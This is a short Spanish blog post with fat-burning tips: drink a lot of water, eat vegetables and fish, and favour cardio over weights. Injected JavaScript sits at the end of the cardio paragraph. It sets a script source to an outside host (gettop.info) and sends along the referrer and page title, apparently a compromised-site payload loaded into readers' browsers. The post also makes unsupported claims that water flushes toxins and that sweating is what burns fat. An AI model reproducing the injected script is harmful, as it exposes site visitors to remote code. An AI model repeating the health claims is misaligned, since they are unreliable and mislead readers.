Salud y belleza » Deportes

La Biblia del “quemagrasa”

Sin Comentarios

Para muchos, el deporte representa cierta clase de religión: es decir, un estilo de vida particular establecido principalmente de acuerdo a reglas o preceptos. En ese caso, entonces, no quedan dudas de que uno de los más importantes evangelios que tiene el deporte y la vida sana reza lo siguiente: “quemarás la grasa”.

La pregunta es, ¿cómo hacerlo? Rezando no, eso seguramente. Para eliminar el tejido adiposo hace falta tener constancia, comer bien, hacer ejercicio…y respetar algunos de los hábitos que presentamos a continuación. Toma los “hábitos”: quema la grasa.

Ingerir entre dos y tres litros de líquidos diario

Beber agua especialmente representa la mejor forma de eliminar toxinas y contribuir al proceso digestivo con lo cual indefectiblemente, se logrará quemar algo de grasas. Desde ya, es necesario además comer bien y sobre eso justamente…

Llevar una dieta rica en vegetas y frutas

Como decíamos, el líquido es fundamental más no mágico: hace falta comer bien para potenciar todo efecto. Así reducir los carbohidratos y aumentar los alimentos con alto porcentaje de agua puede ser un excelente ejercicio. Además, entre las carnes, elegir el pescado y de los lácteos, optar por los menos cremosos.

Hacer hincapie en el trabajo aeróbico (cardio)

Quienes realizan trabajo anaeróbico o pesas tienen mas dificultades para quemar grasa que aquellos que, en cambio, corren, trotan, etc. Sucede que la labor aeróbica ayuda a transpirar mucho más y nada más útil que ese ejercicio para quemar realmente las grasas.}s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '';

Más consejos de salud y belleza : ,

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.